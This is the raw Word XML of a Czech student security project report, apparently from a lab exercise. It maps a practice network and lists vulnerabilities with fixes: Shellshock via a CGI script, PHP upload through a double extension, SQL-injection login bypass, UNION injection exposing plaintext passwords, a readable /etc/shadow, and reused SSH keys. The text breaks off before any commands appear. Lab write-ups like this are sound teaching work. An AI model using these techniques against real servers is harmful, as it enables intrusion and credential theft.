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E9A37" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F67BB90" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B17B1F" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478A66E3" w14:textId="5993585B" w:rsidR="00272002" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="cs-CZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="151287CE" wp14:editId="01C7340F">
            <wp:extent cx="4333875" cy="1444625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:docPr id="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3875" cy="1444625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E59F1" w14:textId="77777777" w:rsidR="00272002" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB21D53" w14:textId="77777777" w:rsidR="00272002" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31208D80" w14:textId="77777777" w:rsidR="00272002" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0389244F" w14:textId="77777777" w:rsidR="00272002" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799B5770" w14:textId="77777777" w:rsidR="00272002" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B411D3" w14:textId="3F429D5A" w:rsidR="0052562B" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>BIS Projekt 2024/25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895A7F2" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3"/>
    <w:p w14:paraId="7B172EE4" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3"/>
    <w:p w14:paraId="0F96636A" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3"/>
    <w:p w14:paraId="526AA1E7" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C4725E" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD7D360" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CA3EDF" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D271299" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205E30C1" w14:textId="77777777" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00A108D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6985B51D" w14:textId="77777777" w:rsidR="00272002" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB55545" w14:textId="286EAA00" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00272002" w:rsidP="00272002">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vypracoval: Bc. Adam Hos (xhosad00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387C7B52" w14:textId="776BD477" w:rsidR="00A108D3" w:rsidRPr="00013512" w:rsidRDefault="00A108D3" w:rsidP="00E83EAE">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00ED1022" w:rsidRPr="00013512">
        <w:lastRenderedPageBreak/>
        <w:t>Zmapování středozemně</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCF88EB" w14:textId="2BA91E2C" w:rsidR="00ED1022" w:rsidRPr="00013512" w:rsidRDefault="00ED1022" w:rsidP="005742A6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">Prvním úkolem je zmapování dané sítě. K uživatelskému stroji se dá připojit pomocí příkazu </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh. </w:t>
      </w:r>
      <w:r w:rsidR="005742A6" w:rsidRPr="00013512">
        <w:t xml:space="preserve">Užitím příkazu </w:t>
      </w:r>
      <w:r w:rsidR="005742A6" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr </w:t>
      </w:r>
      <w:r w:rsidR="005742A6" w:rsidRPr="00013512">
        <w:t>je možná zjistit následující připojení:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56842742" w14:textId="28E78262" w:rsidR="005742A6" w:rsidRPr="00013512" w:rsidRDefault="005742A6" w:rsidP="005742A6">
      <w:pPr>
        <w:pStyle w:val="typewrite"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>eth0 10.89.1.212/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268D69D2" w14:textId="3CCC5FD6" w:rsidR="005742A6" w:rsidRPr="00013512" w:rsidRDefault="005742A6" w:rsidP="005742A6">
      <w:pPr>
        <w:pStyle w:val="typewrite"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>eth1 10.89.47.2/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68209B" w14:textId="77777777" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="005742A6" w:rsidP="005742A6">
      <w:r w:rsidRPr="00013512">
        <w:t>Neboli stroj je připojený do dvou sítí s těmito adresami.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39468A3D" w14:textId="2B003E52" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="005742A6">
      <w:r w:rsidRPr="00013512">
        <w:tab/>
        <w:t>Kvůli technické chybě nelze vypsat názvy zařízení</w:t>
      </w:r>
      <w:r w:rsidR="00BD4C0E" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D37FF" w:rsidRPr="00013512">
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:r w:rsidR="00BD4C0E" w:rsidRPr="00013512">
        <w:t>sít</w:t>
      </w:r>
      <w:r w:rsidR="000D37FF" w:rsidRPr="00013512">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>. Sítě mají následující složení:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0296B" w14:textId="74E0CFE8" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="00990826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 22 ssh (Open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBFC401" w14:textId="102669E0" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="004B7C4B">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF0F4D" w14:textId="6866DFC6" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="00990826">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.212 (de0bce1672d1</w:t>
      </w:r>
      <w:r w:rsidR="000E4D78" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> moje připojovací stanice</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48643683" w14:textId="7D21AE3E" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00013512" w:rsidP="00EF7C90">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A další SSH</w:t>
      </w:r>
      <w:r w:rsidR="004B7C4B">
        <w:t xml:space="preserve"> stanice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (pravděpodobně </w:t>
      </w:r>
      <w:r w:rsidR="004B7C4B">
        <w:t>stroje jiných studentů)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C24D1" w14:textId="37D1D436" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="00990826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 80 http (Open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666D4EF9" w14:textId="6D9B0296" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="00990826">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.157</w:t>
      </w:r>
      <w:r w:rsidR="00291EF1" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> (The Iron Fortress – název z .html nástrojem curl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C14992" w14:textId="628F0968" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="008B2138">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.159</w:t>
      </w:r>
      <w:r w:rsidR="00291EF1" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> (Mirkwood – název z .html nástrojem curl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C303398" w14:textId="5695A5A0" w:rsidR="00990826" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="00990826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 21 ftp (Open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E62212" w14:textId="53C6DAC1" w:rsidR="00D16169" w:rsidRPr="00013512" w:rsidRDefault="00990826" w:rsidP="00013512">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.158</w:t>
      </w:r>
      <w:r w:rsidR="005742A6" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367727FC" w14:textId="77777777" w:rsidR="00013512" w:rsidRPr="00013512" w:rsidRDefault="00D16169" w:rsidP="00013512">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>Zranitelnosti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445CBB0" w14:textId="77777777" w:rsidR="00013512" w:rsidRPr="00013512" w:rsidRDefault="00013512" w:rsidP="00013512">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3C9F2" w14:textId="77777777" w:rsidR="00013512" w:rsidRDefault="00013512" w:rsidP="00013512">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>Zranitelnost shell shock přes /cgi-bin/gate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8A528" w14:textId="514A7B74" w:rsidR="00A54434" w:rsidRPr="00013512" w:rsidRDefault="00A54434" w:rsidP="00A54434">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aktualizace bash na nejnovější verzi</w:t>
      </w:r>
      <w:r w:rsidR="004E787E">
        <w:t xml:space="preserve"> nebo jiné řešení než </w:t>
      </w:r>
      <w:r w:rsidR="004E787E" w:rsidRPr="00013512">
        <w:t>/cgi-bin/gate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A872CCC" w14:textId="77777777" w:rsidR="00013512" w:rsidRDefault="00013512" w:rsidP="00013512">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.158</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23338907" w14:textId="44791472" w:rsidR="00554424" w:rsidRDefault="00554424" w:rsidP="00554424">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Login pro admina je na serveru </w:t>
      </w:r>
      <w:r w:rsidRPr="00554424">
        <w:t>10.89.1.159</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A464B0" w14:textId="42F7033E" w:rsidR="006048A4" w:rsidRDefault="006048A4" w:rsidP="006048A4">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Odstranění záznamů nebo aspoň hashování hesel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CDA6C" w14:textId="4F0CDB13" w:rsidR="007B1AF0" w:rsidRPr="006048A4" w:rsidRDefault="007B1AF0" w:rsidP="00554424">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Viditelný </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB433B1" w14:textId="4D1B3320" w:rsidR="006048A4" w:rsidRPr="007B1AF0" w:rsidRDefault="006048A4" w:rsidP="006048A4">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Přístup by měl mít pouze root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6345F" w14:textId="2E13508E" w:rsidR="007B1AF0" w:rsidRDefault="007B1AF0" w:rsidP="00554424">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">admin a theodon </w:t>
      </w:r>
      <w:r>
        <w:t>mají stejné heslo (a hash hesla)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49588958" w14:textId="19F07A7F" w:rsidR="0065705F" w:rsidRPr="00554424" w:rsidRDefault="0065705F" w:rsidP="0065705F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nucené silnější hesla</w:t>
      </w:r>
      <w:r w:rsidR="00DA0D9F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE4675" w14:textId="77777777" w:rsidR="00013512" w:rsidRDefault="00013512" w:rsidP="00013512">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>10.89.1.159</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C266CF" w14:textId="574955AA" w:rsidR="007B1AF0" w:rsidRDefault="00C824AF" w:rsidP="00C824AF">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na </w:t>
      </w:r>
      <w:r w:rsidRPr="002005CC">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>upload.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je možná uložit php skript (s hlavičkou obrázku a správnými příponami, např. file.jpeg.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C66BD" w14:textId="296EDACE" w:rsidR="00A54434" w:rsidRDefault="00A54434" w:rsidP="00A54434">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lepší kontrola MIME typu, lepší REGEX pro jméno souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DBEED" w14:textId="21B04166" w:rsidR="00255214" w:rsidRPr="00A54434" w:rsidRDefault="00255214" w:rsidP="00255214">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>authenticate.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lze přejít jednoduchým SQL injection, zobrazí tak </w:t>
      </w:r>
      <w:r w:rsidRPr="00255214">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>list.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47C12F" w14:textId="53056633" w:rsidR="00A54434" w:rsidRDefault="00A54434" w:rsidP="00A54434">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Použití parametrizovaných dotazů</w:t>
      </w:r>
      <w:r w:rsidR="0074287A">
        <w:t xml:space="preserve"> místo dynamických sestavených příkazů.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5590581A" w14:textId="50C464C4" w:rsidR="00255214" w:rsidRDefault="00255214" w:rsidP="000464B8">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na </w:t>
      </w:r>
      <w:r w:rsidRPr="00255214">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>list.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lze </w:t>
      </w:r>
      <w:r>
        <w:t>přes UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL injection, </w:t>
      </w:r>
      <w:r>
        <w:t>zobrazit data z tabulky users, kde jsou nešifrovaná data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0F6E7" w14:textId="11403054" w:rsidR="00A54434" w:rsidRPr="007B1AF0" w:rsidRDefault="00A54434" w:rsidP="00A54434">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hashování hesel</w:t>
      </w:r>
      <w:r w:rsidR="0074287A">
        <w:t xml:space="preserve"> v tabulce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71C0C1" w14:textId="77777777" w:rsidR="00013512" w:rsidRDefault="00013512" w:rsidP="00013512">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:lastRenderedPageBreak/>
        <w:t>10.89.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002619CC" w14:textId="2E36801E" w:rsidR="001919B9" w:rsidRPr="001919B9" w:rsidRDefault="001919B9" w:rsidP="001919B9">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na serveru jsem nezjistil žádnou potřebnou zranitelnost pro získání tajemství, stačilo </w:t>
      </w:r>
      <w:r w:rsidR="00AE52D9">
        <w:t xml:space="preserve">využít konfiguraci v .ssh a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">použít ssh klíč pro připojení a stáhnout soubor chest.img. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C1153" w14:textId="28FCAC8B" w:rsidR="00013512" w:rsidRPr="00013512" w:rsidRDefault="00D16169" w:rsidP="00EF6A32">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>Nalezení tajemství</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D26503" w14:textId="67E08BEB" w:rsidR="006352AF" w:rsidRPr="00013512" w:rsidRDefault="006352AF" w:rsidP="005F5F5F">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C863B9" w14:textId="475CCCD3" w:rsidR="006352AF" w:rsidRPr="00D9392D" w:rsidRDefault="006352AF" w:rsidP="006352AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The secret A is hidden deep down in the shadow of the Iron Fortress. Although the gate used to be hard as a shell, nowadays it looks like it could easily crumble from a shock. A marking at the base of the gate shows the number: 2014-6271. It seems like the housekeeper of the Iron Fortress forgot to upgrade the defences of his house.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C8822" w14:textId="46ACECDD" w:rsidR="00776D4A" w:rsidRPr="00013512" w:rsidRDefault="00776D4A" w:rsidP="00776D4A">
      <w:r w:rsidRPr="00013512">
        <w:t>Jedná se o tajemství na serveru 10.89.1.157. Pomocí příkazu curl jsem si stáhl obsah http stránku. Z ní je možné vyčíst, že obsahuje odkaz na /cgi-bin/gate. S kombinací s </w:t>
      </w:r>
      <w:r w:rsidR="00013512" w:rsidRPr="00013512">
        <w:t>tipem 2014</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">-6271 lze odvodit, že jde o zranitelnost </w:t>
      </w:r>
      <w:r w:rsidR="00737915" w:rsidRPr="00013512">
        <w:t>shell shock (</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>CVE-2014-6271</w:t>
      </w:r>
      <w:r w:rsidR="00737915" w:rsidRPr="00013512">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C4A41" w14:textId="77777777" w:rsidR="005719D7" w:rsidRPr="00013512" w:rsidRDefault="00737915" w:rsidP="00776D4A">
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">Pomocí </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> jsem otestoval, že je skutečně možné využít shell shock.</w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Vyzkoušel jsem příkazy jako </w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:rPr>
